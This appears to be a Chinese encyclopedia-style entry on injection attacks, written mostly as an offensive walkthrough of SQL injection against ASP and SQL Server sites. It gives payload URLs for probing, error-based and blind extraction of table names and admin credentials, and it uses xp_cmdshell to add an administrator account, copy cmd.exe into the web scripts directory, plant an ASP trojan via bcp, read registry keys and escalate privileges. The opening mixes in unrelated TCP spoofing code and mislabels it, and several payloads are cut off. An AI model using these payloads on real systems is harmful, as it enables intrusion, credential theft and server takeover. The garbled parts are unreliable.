基本介紹
- 中文名:注射式攻擊
- 外文名:SQL Injection
- 起因:隨著B/S模式套用開發的發展
- 類型:應用程式
注入攻擊簡介:,注入攻擊的使用:,SQL注入漏洞的判斷,區分資料庫伺服器類型,確定XP_CMDSHELL可執行情況,發現WEB虛擬目錄,上傳ASP木馬,得到系統的管理員許可權,備用資料,
注入攻擊簡介:
這種方式的會話劫持比中間人攻擊實現起來簡單一些,它不會改變會話雙方的通訊流,而是在雙方正常的通訊流插入惡意數據。在注射式攻擊中,需要實現兩種技術:1)IP欺騙,2)預測TCP序列號。如果是UDP協定,只需偽造IP位址,然後傳送過去就可以了,因為UDP沒有所謂的TCP三次握手,但基於UDP的套用協定有流控機制,所以也要做一些額外的工作。對於IP欺騙,有兩種情況需要用到:1)隱藏自己的IP位址;2)利用兩台機器之間的信任關係實施入侵。在Unix/Linux平台上,可以直接使用Socket構造IP包,在IP頭中填上虛假的IP位址,但需要root許可權;在Windows平台上,不能使用Winsock,需要使用Winpacp(也可以使用Libnet)。例如在Linux系統,首先打開一個Raw Socket(原始套接字),然後自己編寫IP頭及其他數據。
可以參考下面的實例代碼:
sockfd = socket(AF_INET, SOCK_RAW, 255);
setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
struct ip *ip;
struct tcphdr *tcp;
struct pseudohdr pseudoheader;
ip->ip_src.s_addr = xxx;
pseudoheader.saddr.s_addr = ip->ip_src.s_addr;
tcp->check = tcpchksum((u_short *)&pseudoheader,12+sizeof(struct tcphdr));
sendto(sockfd, buf, len, 0, (const sockaddr *)addr, sizeof(struct sockaddr_in));
注入攻擊的使用:
SQL注入是從正常的WWW連線埠訪問,而且表面看起來跟一般的Web頁面訪問沒什麼區
別,所以目前市面的防火牆都不會對SQL注入發出警報,如果管理員沒查看IIS日誌
的習慣,可能被入侵很長時間都不會發覺。但是,SQL注入的手法相當靈活,在注
入的時候會碰到很多意外的情況。能不能根據具體情況進行分析,構造巧妙的SQL
語句,從而成功獲取想要的數據。
據統計,網站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不
足10%。在本文,以SQL-SERVER+ASP例說明SQL注入的原理、方法與過程。(PHP注
入的文章由NB聯盟的另一位朋友zwell撰寫的有關文章)
SQL注入攻擊的總體思路是:
l 發現SQL注入位置;
l 判斷後台資料庫類型;
l 確定XP_CMDSHELL可執行情況
l 發現WEB虛擬目錄
l 上傳ASP木馬;
l 得到管理員許可權;
SQL注入漏洞的判斷
一般來說,SQL注入一般存在於形如:HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有
參數的ASP動態網頁中,有時一個動態網頁中可能只有一個參數,有時可能有N個參
數,有時是整型參數,有時是字元串型參數,不能一概而論。總之只要是帶有參數
的動態網頁且此網頁訪問了資料庫,那么就有可能存在SQL注入。如果ASP程式設計師沒
有安全意識,不進行必要的字元過濾,存在SQL注入的可能性就非常大。
為了全面了解動態網頁回答的信息,首選請調整IE的配置。把IE選單-工具-
Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉。
為了把問題說明清楚,以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY為例進行分析,
YY可能是整型,也有可能是字元串。
1、整型參數的判斷
當輸入的參數YY為整型時,通常abc.asp中SQL語句原貌大致如下:
select * from 表名 where 欄位=YY,所以可以用以下步驟測試SQL注入是否存在
。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY'(附加一個單引號),此時abc.ASP中的SQL語
句變成了
select * from 表名 where 欄位=YY',abc.asp運行異常;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常,而且與
HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同;
③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常;
如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
2、字元串型參數的判斷
當輸入的參數YY為字元串時,通常abc.asp中SQL語句原貌大致如下:
select * from 表名 where 欄位='YY',所以可以用以下步驟測試SQL注入是否存
在。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY'(附加一個單引號),此時abc.ASP中的SQL語
句變成了
select * from 表名 where 欄位=YY',abc.asp運行異常;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='1', abc.asp運行正常,而
且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同;
③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='2', abc.asp運行異常;
如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
3、特殊情況的處理
有時ASP程式設計師會在程式設計師過濾掉單引號等字元,以防止SQL注入。此時可以用以下
幾種方法試一試。
①大小定混合法:由於VBS並不區分大小寫,而程式設計師在過濾時通常要么全部過濾
大寫字元串,要么全部過濾小寫字元串,而大小寫混合往往會被忽視。如用SelecT
代替select,SELECT等;
②UNICODE法:在IIS中,以UNICODE字元集實現國際化,我們完全可以IE中輸入的
字元串化成UNICODE字元串進行輸入。如+ =%2B,空格=%20 等;URLEncode信息參
見附屬檔案一;
③ASCII碼法:可以把輸入的部分或全部字元全部用ASCII碼代替,如U=chr
(85),a=chr(97)等,ASCII信息參見附屬檔案二;
區分資料庫伺服器類型
一般來說,ACCESS與SQL-SERVER是最常用的資料庫伺服器,儘管它們都支持T-
SQL標準,但還有不同之處,而且不同的資料庫有不同的攻擊方法,必須要區別對
待。
1、 利用資料庫伺服器的系統變數進行區分
SQL-SERVER有user,db_name()等系統變數,利用這些系統值不僅可以判斷SQL-
SERVER,而且還可以得到大量有用信息。如:
① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-
SERVER,而還可以得到當前連線到資料庫的用戶名
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅可以判斷是否是
SQL-SERVER,而還可以得到當前正在使用的資料庫名;
2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問許可權,而SQL-SERVER的系
統表是sysobjects,在WEB環境下有訪問許可權。對於以下兩條語句:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)
>0
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from
msysobjects)>0
若資料庫是SQL-SERVE,則第一條,abc.asp一定運行正常,第二條則異常;若是
ACCESS則兩條都會異常。
3、 MSSQL三個關鍵系統表
sysdatabases系統表:Microsoft SQL Server 上的每個資料庫在表中占一行。最
初安裝 SQL Server 時,sysdatabases 包含 master、model、msdb、mssqlweb 和
tempdb 資料庫的項。該表只存儲在 master 資料庫中。 這個表保存在master數據
庫中,這個表中保存的是什麼信息呢?這個非常重要。他是 保存了所有的庫名,以
及庫的ID和一些相關信息。
這裡我把對於我們有用的欄位名稱和相關說明給大家列出來。name //表示庫的名
字。
dbid //表示庫的ID,dbid從1到5是系統的。分別是:master、model、msdb、
mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可
以查詢出所有的庫名。
Sysobjects:SQL-SERVER的每個資料庫內都有此系統表,它存放該資料庫內創建的
以下是此系統表的欄位名稱和相關說明。
Name,id,xtype,uid,status:分別是對象名,對象ID,對象類型,所有者對象
的用戶ID,對象狀態。
對象類型(xtype)。可以是下列對象類型中的一種:
C = CHECK 約束
D = 默認值或 DEFAULT 約束
F = FOREIGN KEY 約束
L = 日誌
FN = 標量函式
IF = 內嵌表函式
P = 存儲過程
PK = PRIMARY KEY 約束(類型是 K)
RF = 複製篩選存儲過程
S = 系統表
TF = 表函式
TR = 觸發器
U = 用戶表
UQ = UNIQUE 約束(類型是 K)
V = 視圖
X = 擴展存儲過程
當xtype='U' and status>0代表是用戶建立的表,對象名就是表名,對象ID就是表
的ID值。
用: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 就
可以列出庫ChouYFD中所有的用戶建立的表名。
syscolumns :每個表和視圖中的每列在表中占一行,存儲過程中的每個參數在表
中也占一行。該表位於每個資料庫中。主要欄位有:
name ,id, colid :分別是欄位名稱,表ID號,欄位ID號,其中的 ID 是 剛上
我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD
這個庫中,表的ID是123456789中的所有欄位列表。
確定XP_CMDSHELL可執行情況
用此存儲過程可以直接使用作業系統的shell)能夠正確執行,則整個計算機可以通
過以下幾種方法完全控制,以後的所有步驟都可以省
1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執行異常但可以得到
當前連線資料庫的用戶名(若顯示dbo則代表SA)。
2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到
當前連線的資料庫名。
3、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell "net user
aaa bbb /add"-- (master是SQL-SERVER的主資料庫;名中的分號表示SQL-SERVER
執行完分號前的語句名,繼續執行其後面的語句;"—"號是註解,表示其後面的所
有內容僅為注釋,系統並不執行)可以直接增加作業系統帳戶aaa,密碼為bbb。
4、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell "net
localgroup administrators aaa /add"-- 把剛剛增加的帳戶aaa加到
administrators組中。
5、HTTP://xxx.xxx.xxx/abc.asp?p=YY;backuup database 資料庫名 to
disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容全部備份到WEB目錄下
,再用HTTP把此檔案下載(當然首選要知道WEB虛擬目錄)。
6、通過複製CMD創建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell "copy
c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" 便製造了一個
UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要
知道WEB虛擬目錄)。
發現WEB虛擬目錄
只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進而得到USER許可權。有兩種
方法比較有效。
一是根據經驗猜解,一般來說,WEB虛擬目錄是:c:\inetpub\wwwroot;
D:\inetpub\wwwroot; E:\inetpub\wwwroot等,而可執行虛擬目錄是:
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。
二是遍歷系統的目錄結構,分析結果並發現WEB虛擬目錄;
先創建一個臨時表:temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1
nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下來:
(1)我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ...
ter.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
(2)我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs
'c:\';--
(3)我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec
master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄(資料夾)列表:
如果我們需要查看某個檔案的內容,可以通過執行xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type
c:\web\index.asp';--
使用'bulk insert'語法可以將一個文本檔案插入到一個臨時表中。如:bulk
insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp檔案的內容了!通過分析各種ASP檔案,可以得到大
量系統信息,WEB建設與管理信息,甚至可以得到SA帳號的連線密碼。
當然,如果xp_cmshell能夠執行,我們可以用它來完成:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell
'dir c:\';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell
'dir c:\ *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的,包括W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec
master.dbo.xp_cmdshe ... ub\AdminScripts\adsutil.vbs enum w3svc'
但是,如果不是SA許可權,我們還可以使用
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec
master.dbo.xp_dirtree 'c:\';--
注意:
1、以上每完成一項瀏覽後,應刪除TEMP中的所有內容,刪除方法是:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2、瀏覽TEMP表的方法是:(假設TestDB是當前連線的資料庫名)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ...
nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id欄位的值,並與整數進行
比較,顯然abc.asp工作異常,但在異常中卻可以發現id欄位的值。假設發現的表
名是xyz,則
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not
in('xyz'))>0 得到表TEMP中第二條記錄id欄位的值。
上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼,並放入WEB虛擬目錄的Scripts下,
遠程客戶通過IE就可執行它,進而得到系統的USER許可權,實現對系統的初步控制。
上傳ASP木馬一般有兩種比較有效的方法:
1、利用WEB的遠程管理功能
許多WEB站點,為了維護的方便,都提供了遠程管理的功能;也有不少WEB站點,其
內容是對於不同的用戶有不同的訪問許可權。為了達到對用戶許可權的控制,都有一個
網頁,要求用戶名與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實
現對WEB的管理,如上傳、下載檔案,目錄瀏覽、修改配置等。
因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時甚至能夠直接得
到USER許可權而瀏覽系統,上一步的"發現WEB虛擬目錄"的複雜操作都可省略。
用戶名及密碼一般存放在一張表中,發現這張表並讀取其中內容便解決了問題。以
下給出兩種有效方法。
A、 注入法:
從理論上說,認證網頁中會有型如:
select * from admin where username='XXX' and password='YYY' 的語句,若在
正式運行此句之前,沒有進行必要的字元過濾,則很容易實施SQL注入。
如在用戶名文本框內輸入:abc' or 1=1-- 在密碼框內輸入:123 則SQL語句變成
:
select * from admin where username='abc' or 1=1 and password='123' 不管
用戶輸入任何用戶名與密碼,此語句永遠都能正確執行,用戶輕易騙過系統,獲取
合法身份。
B、猜解法:
基本思路是:猜解所有資料庫名稱,猜出庫中的每張表名,分析可能是存放用戶名
與密碼的表名,猜出表中的每個欄位名,猜出表中的每條記錄內容。
l 猜解所有資料庫名稱
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from
master.dbo.sysdatabases where name>1 and dbid=6) <>0 因為 dbid 的值從1到
5,是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1
(name欄位是一個字元型的欄位和數字比較會出錯),abc.asp工作異常,可得到第一
個資料庫名,同理把DBID分別改成7,8,9,10,11,12...就可得到所有資料庫名。
以下假設得到的資料庫名是TestDB。
l 猜解資料庫中用戶名表的名稱
猜解法:此方法就是根據個人的經驗猜表名,一般來說,
user,users,member,members,userlist,memberlist,userinfo,manager,admin,adm
inuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccount
s等。並通過語句進行判斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表
名)>0 若表名存在,則abc.asp工作正常,否則異常。如此循環,直到猜到系統帳
號表的名稱。
讀取法:SQL-SERVER有一個存放系統核心信息的表sysobjects,有關一個庫的所有
表,視圖等信息全部存放在此表中,而且此表可以通過WEB進行訪問。
當xtype='U' and status>0代表是用戶建立的表,發現並分析每一個用戶建立的表
及名稱,便可以得到用戶名表的名稱,基本的實現方法是:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ...
type='U' and status>0 )>0 得到第一個用戶建立表的名稱,並與整數進行比較,
顯然abc.asp工作異常,但在異常中卻可以發現表的名稱。假設發現的表名是xyz,
則
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from
TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 可以得到第
二個用戶建立的表的名稱,同理就可得到所有用建立的表的名稱。
根據表的名稱,一般可以認定那張表用戶存放用戶名及密碼,以下假設此表名為
Admin。
l 猜解用戶名欄位及密碼欄位名稱
admin表中一定有一個用戶名欄位,也一定有一個密碼欄位,只有得到此兩個欄位
的名稱,才有可能得到此兩欄位的內容。如何得到它們的名稱呢,同樣有以下兩種
方法。
猜解法:此方法就是根據個人的經驗猜欄位名,一般來說,用戶名欄位的名稱常用
:username,name,user,account等。而密碼欄位的名稱常用:
password,pass,pwd,passwd等。並通過語句進行判斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(欄位名) from
TestDB.dbo.admin)>0 "select count(欄位名) from 表名"語句得到表的行數,所
以若欄位名存在,則abc.asp工作正常,否則異常。如此循環,直到猜到兩個欄位
的名稱。
讀取法:基本的實現方法是
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1)
from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id
('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一
個欄位名,當與整數進行比較,顯然abc.asp工作異常,但在異常中卻可以發現字
段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5,6...就可
得到所有的欄位名稱。
l 猜解用戶名與密碼
猜用戶名與密碼的內容最常用也是最有效的方法有:
ASCII碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的。基本的思路是先猜
出欄位的長度,然後依次猜出每一位的值。猜用戶名與猜密碼的方法相同,以下以
猜用戶名為例說明其過程。
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from
TestDB.dbo.admin)=X(X=1,2,3,4,5,... n,username為用戶名欄位的名稱,
admin為表的名稱),若x為某一值i且abc.asp運行正常時,則i就是第一個用戶名的
長度。如:當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from
TestDB.dbo.admin)=8時abc.asp運行正常,則第一個用戶名的長度為8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring
(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長
度之間,當m=1,2,3,...時猜測分別猜測第1,2,3,...位的值;n的值是1~9、a~z
、A~Z的ASCII值,也就是1~128之間的任意值;admin為系統用戶帳號表的名稱),
若n為某一值i且abc.asp運行正常時,則i對應ASCII碼就是用戶名某一位值。如:
當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring
(username,3,1)) from TestDB.dbo.admin)=80時abc.asp運行正常,則用戶名的第
三位為P(P的ASCII為80);
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring
(username,9,1)) from TestDB.dbo.admin)=33時abc.asp運行正常,則用戶名的第
9位為!(!的ASCII為80);
猜到第一個用戶名及密碼後,同理,可以猜出其他所有用戶名與密碼。注意:有時
得到的密碼可能是經MD5等方式加密後的信息,還需要用專用工具進行脫密。或者
先改其密碼,使用完後再改回來,見下面說明。
簡單法:猜用戶名用
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where
username>1) , flag是admin表中的一個欄位,username是用戶名欄位,此時
abc.asp工作異常,但能得到Username的值。與上同樣的方法,可以得到第二用戶
名,第三個用戶等等,直到表中的所有用戶名。
猜用戶密碼:HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ...
B.dbo.admin where pwd>1) , flag是admin表中的一個欄位,pwd是密碼欄位,此
時abc.asp工作異常,但能得到pwd的值。與上同樣的方法,可以得到第二用戶名的
密碼,第三個用戶的密碼等等,直到表中的所有用戶的密碼。密碼有時是經MD5加
密的,可以改密碼。
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ...
where username='www';-- ( 1的MD5值為:AAABBBCCCDDDEEEF,即把密碼改成1;
www為已知的用戶名)
用同樣的方法當然可把密碼改原來的值。
2、利用表內容導成檔案功能
SQL有BCP命令,它可以把表的內容導成文本檔案並放到指定位置。利用這項功能,
我們可以先建一張臨時表,然後在表中一行一行地輸入一個ASP木馬,然後用BCP命
令導出形成ASP檔案。
命令行格式如下:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp
-c -S localhost -U sa -P foobar ('S'參數為執行查詢的伺服器,'U'參數為用
戶名,'P'參數為密碼,最終上傳了一個runcommand.asp的木馬)
得到系統的管理員許可權
ASP木馬只有USER許可權,要想獲取對系統的完全控制,還要有系統的管理員許可權。
怎么辦?提升許可權的方法有很多種:
上傳木馬,修改開機自動運行的.ini檔案(它一重啟,便死定了);
複製CMD.exe到scripts,人為製造UNICODE漏洞;
下載SAM檔案,破解並獲取OS的所有用戶名密碼;
等等,視系統的具體情況而定,可以採取不同的方法。
七、幾個SQL-SERVER專用手段
1、利用xp_regread擴展存儲過程修改註冊表
[xp_regread]另一個有用的內置存儲過程是xp_regXXXX類的函式集合
(Xp_regaddmultistring,Xp_regdeletekey,Xp_regdeletevalue,
Xp_regenumkeys,Xp_regenumvalues,Xp_regread,Xp_regremovemultistring,
Xp_regwrite)。攻擊者可以利用這些函式修改註冊表,如讀取SAM值,允許建立空
連線,開機自動運行程式等。如:
exec xp_regread
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\param
eters', 'nullsessionshares' 確定什麼樣的會話連線在伺服器可用。
exec xp_regenumvalues
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\va
lidcommunities' 顯示伺服器上所有SNMP團體配置,有了這些信息,攻擊者或許會
重新配置同一網路中的網路設備。
2、利用其他存儲過程去改變伺服器
xp_servicecontrol過程允許用戶啟動,停止服務。如:
(exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server')
Xp_availablemedia 顯示機器上有用的驅動器
Xp_dirtree 允許獲得一個目錄樹
Xp_enumdsn 列舉伺服器上的ODBC數據源
Xp_loginconfig 獲取伺服器安全信息
Xp_makecab 允許用戶在伺服器上創建一個壓縮檔案
Xp_ntsec_enumdomains 列舉伺服器可以進入的域
Xp_terminate_process 提供進程的進程ID,終止此進程
備用資料
附屬檔案一:URLUnicode表(節選,主要是非字母的字元,RFC1738)
字元 特殊字元的含義 URL編碼
# 用來標誌特定的文檔位置 %23
% 對特殊字元進行編碼 %25
& 分隔不同的變數值對 %26
+ 在變數值中表示空格 %2B
/ 表示目錄路徑 %2F
\ %5C
= 用來連線鍵和值 %3D
? 表示查詢字元串的開始 %3F
空格 %20
. 句號 %2E
: 冒號 %3A
附屬檔案二:ASCII表(節選)
Dec Hex Char Dec Hex Char
80 50 P
32 20 (space) 81 51 Q
33 21 ! 82 52 R
34 22 " 83 53 S
35 23 # 84 54 T
36 24 $Content$nbsp; 85 55 U
37 25 % 86 56 V
38 26 & 87 57 W
39 27 ' 88 58 X
40 28 ( 89 59 Y
41 29 ) 90 5A Z
42 2A * 91 5B [
43 2B + 92 5C \
44 2C , 93 5D ]
45 2D - 94 5E ^
46 2E . 95 5F _
47 2F / 96 60 `
48 30 0 97 61 a
49 31 1 98 62 b
50 32 2 99 63 c
51 33 3 100 64 d
52 34 4
53 35 5 101 65 e
54 36 6 102 66 f
55 37 7 103 67 g
56 38 8 104 68 h
57 39 9 105 69 i
58 3A : 106 6A j
59 3B ; 107 6B k
60 3C < 108 6C l
61 3D = 109 6D m
62 3E > 110 6E n
63 3F ? 111 6F o
112 70 p
64 40 @ 113 72 q
65 41 A 114 72 r
66 42 B 115 73 s
67 43 C 116 74 t
68 44 D 117 75 u
69 45 E 118 76 v
70 46 F 119 77 w
71 47 G 120 78 x
72 48 H 121 79 y
73 49 I 122 7A z
74 4A J 123 7B {
75 4B K 124 7C |
76 4C L 125 7D }
77 4D M 126 7E ~
78 4E N 127 7F ?
79 4F O 128 80
